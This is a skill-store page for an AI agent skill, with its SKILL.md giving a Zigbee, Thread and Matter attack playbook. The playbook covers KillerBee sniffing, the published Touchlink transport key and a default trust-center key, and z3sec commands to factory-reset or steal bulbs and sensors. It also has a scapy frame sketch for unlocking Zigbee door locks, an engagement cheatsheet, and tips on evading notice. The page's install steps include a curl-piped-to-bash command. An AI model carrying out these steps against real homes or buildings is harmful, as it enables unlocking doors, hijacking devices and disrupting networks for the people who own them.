offensive-zigbee-thread-matter
Zigbee, Thread, and Matter mesh-protocol attack methodology — IEEE 802.15.4 sniffing with TI CC2531 / CC2540 / Sonoff Zigbee Dongle E, KillerBee toolkit, Touchlink commissioning abuse with the well-known transport key, replay/injection attacks, Zigbee Cluster Library command abuse for door locks and bulbs, Thread network credential theft, Matter commissioning chain analysis, and 6LoWPAN/IPv6 routing exploitation. Use when targeting smart-home or commercial mesh deployments, Zigbee-based door locks, lighting, or sensor networks.
适合你,如果需要对 Zigbee/Thread/Matter 协议进行安全评估
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
~/.claude/skills/(项目级 .claude/skills/)~/.codex/skills/npx oh-my-skill add snailsploit/claude-red/offensive-zigbee-thread-mattercurl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-zigbee-thread-matternpx oh-my-skill verify snailsploit/claude-red/offensive-zigbee-thread-matter怎么用
商店整理自技能原文 · 版本 aeb41ec · 表述以原文为准Claude 会指导你使用 KillerBee 等工具嗅探 Zigbee/Thread/Matter 网络、利用已知密钥进行 Touchlink 攻击、捕获网络密钥、重放或注入 ZCL 命令,以及窃取 Thread 凭证和分析 Matter 配网流程。
当你想测试智能家居或商业网状网络的安全性,特别是针对 Zigbee 门锁、灯泡或传感器网络时。
技能原文 SKILL.md
Zigbee / Thread / Matter Attacks
802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls.
Quick Workflow
- Sniff target frequency (channels 11–26 in 2.4 GHz)
- Identify network coordinator and joining devices
- For Zigbee: try Touchlink commissioning with the well-known key
- Capture join-key exchange when devices commission
- Replay or inject ZCL/ZHA cluster commands
Hardware
| Adapter | Use | |---|---| | TI CC2531 USB stick | Cheap, works with Zigbee2MQTT, KillerBee | | TI CC2540 / CC2652 | Zigbee + Thread + BLE | | Sonoff Zigbee Dongle E (CC2652P) | Modern, well-supported | | ApiMote (KillerBee dev) | Multi-channel, scapy-dot15d4 | | HackRF + appropriate firmware | Lower-level RF flexibility |
Discovery + Sniffing
# KillerBee suite zbstumbler -i 0 # find Zigbee networks zbid # ID coordinators zbdump -c 11 -w zigbee.pcap # dump channel 11 to pcap # scapy-dot15d4 for crafted frames python3 >>> from scapy.contrib.dot15d4 import * >>> sniff(iface='/dev/ttyACM0', count=50)
In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands.
Touchlink Commissioning Abuse
Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a well-known transport key:
0x9F559A553B7A6B2C5C4FBB4E84956F3D
Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs.
# z3sec — Zigbee 3 commissioning attack toolkit git clone https://github.com/IoTsec/Z3sec python z3sec_inter_pan.py --command "factory_reset_request" --device <addr> python z3sec_inter_pan.py --command "join_network" --network <PANID>
Outcomes:
- Factory-reset victim devices remotely (DoS / mass disrupt)
- Steal lights / sensors into attacker network
- Read network keys after joining device-to-network
Network Key Capture During Joins
# Capture coordinator + joining device exchange zbdump -c <ch> -w join.pcap # Decrypt if you obtain the trust center link key # Older Zigbee 1.x networks used a default trust center link key: # ZigBeeAlliance09 # Modern networks use device-specific install codes
Once you have the network key, all traffic on that mesh is decrypted in Wireshark.
ZCL / ZHA Cluster Command Abuse
Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device:
# scapy-dot15d4 frame to unlock a door lock from scapy.contrib.dot15d4 import * from scapy.contrib.zigbee import * frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...) sendp(frame, iface='/dev/ttyACM0')
The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic.
Thread Specifics
Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto.
- Network credential is a commissioner-distributed PSKc
- Devices join with the commissioner present
- Mesh commissioning protocol is over UDP/CoAP
Attack surface:
- PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app)
- Reusing a leaked credential to join target network
- 6LoWPAN routing attacks (rank manipulation, sinkhole)
Matter Commissioning
Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model:
- QR code or manual setup code grants commissioning permission
- Bluetooth LE used for initial commissioning
- Subsequent communication over Wi-Fi or Thread
Attack surface:
- Setup-code reuse / replay if commissioning window not closed
- BLE-MITM during initial commissioning (see
offensive-bluetooth-ble) - Fabric-attestation flaws in early implementations
Detection
- Coordinator may log unexpected device joins
- Hub apps surface "new device" notifications — commonly ignored by users
- Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4
Engagement Cheatsheet
# 1. Identify networks + channels zbstumbler -i 0 # 2. Sniff target channel zbdump -c <ch> -w cap.pcap # Open in Wireshark with dot15d4/zigbee dissectors # 3. Touchlink attack on consumer Zigbee 3.0 lighting python z3sec_inter_pan.py --command "factory_reset_request" --target <addr> # 4. Steal device into attacker network python z3sec_inter_pan.py --command "join_network" --target <addr> # 5. With network key, issue ZCL commands directly # (custom scapy-dot15d4 + zbee_nwk frames) # 6. For Thread: focus on commissioner / PSKc theft from companion apps
Key References
- KillerBee: github.com/riverloopsec/killerbee
- Z3sec: github.com/IoTsec/Z3sec
- "Zigbee Insecurity" research (CON Black Hat talks)
- Thread spec: threadgroup.org/support
- Matter / CSA spec: csa-iot.org/all-solutions/matter
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md